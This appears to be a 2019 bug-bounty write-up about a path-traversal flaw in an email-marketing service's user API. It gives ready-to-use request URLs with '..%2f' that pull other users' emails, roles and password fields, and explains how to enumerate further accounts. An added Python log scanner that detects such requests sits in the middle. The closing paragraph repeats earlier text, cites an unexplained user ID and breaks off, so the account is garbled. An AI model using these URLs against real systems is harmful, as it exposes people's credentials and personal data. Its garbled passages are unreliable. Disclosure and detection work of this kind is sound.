Emma Users Information Leak via endpoint traversal

09 May 2019 - saltedfish

Step 1:

   Visit https://settings.e2ma.net/ and log in.

   Visit https://settings.e2ma.net/api/user/..%2ftest1@root.com?fields=user_id,email,user_name_first,user_name_last,role,password. This is the endpoint you reach when you use ..%2f, and you can visit other endpoints the same way. This endpoint allows getting information such as email, password, and every sensitive field, so using ..%2f gets you other users' information, like:

https://settings.e2ma.net/api/user/..%2ftest1@root.com?fields=user_id,email,user_name_first,user_name_last,role,password

https://settings.e2ma.net/api/user/..%2ftest2@root.com?fields=user_id,email,user_name_first,user_name_last,role,password

   I only have two email addresses, so I can give you only two users' information for this demo. You can change test2@root.com to a different email address and get other users' information, such as username and password.
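A defender can look for this request shape in access logs. The following is an added example, not part of the original post: it flags request paths that contain a percent-encoded separator or resolve to a .. segment after decoding. The log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = [
    '203.0.113.5 - - [09/May/2019:10:00:01 +0000] "GET /api/user/me?fields=user_id,email HTTP/1.1" 200 312',
    '203.0.113.5 - - [09/May/2019:10:00:07 +0000] "GET /api/user/..%2ftest1@root.com?fields=user_id,email,role,password HTTP/1.1" 200 498',
    '203.0.113.9 - - [09/May/2019:10:01:13 +0000] "GET /api/user/..%252ftest2@root.com?fields=email HTTP/1.1" 404 0',
    '203.0.113.9 - - [09/May/2019:10:02:40 +0000] "GET /static/app.js HTTP/1.1" 200 10422',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS) (\S+) HTTP/[\d.]+"')
# %2f or %5c, optionally wrapped in further rounds of encoding (%252f, ...).
ENCODED_SEP_RE = re.compile(r'%(?:25)*(?:2f|5c)', re.IGNORECASE)


def traversal_findings(target, max_rounds=3):
    """Return the reasons a request target looks like an encoded traversal."""
    path = urlsplit(target).path          # raw path, query string removed
    findings = []
    if ENCODED_SEP_RE.search(path):
        findings.append("encoded path separator")
    decoded = path
    for _ in range(max_rounds):           # unwrap nested percent-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if ".." in re.split(r"[/\\]", decoded):
        findings.append("dot-dot segment after decoding")
    return findings


def scan(lines):
    """Return (request target, findings) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            findings = traversal_findings(m.group(1))
            if findings:
                hits.append((m.group(1), findings))
    return hits


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_LOG):
        print(target, "->", ", ".join(findings))
```

Detection complements, and does not replace, rejecting such paths at the router and checking authorization on the user record the request resolves to.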

   But then I found that I can get other users' email addresses via this endpoint, and you just need to change 1900932 to get another user's email address. You can get all the information about this user at this endpoint: https://settings.e2ma.net/api/user/..%2ftest1@root.com?fields=user_id,email,user_name_first,user_name_last,role,password. This is the endpoint you reach when you use ..%2f. You can also access other endpoints as well. So… this endpoint allows getting information such as email, password, and every sensitive field: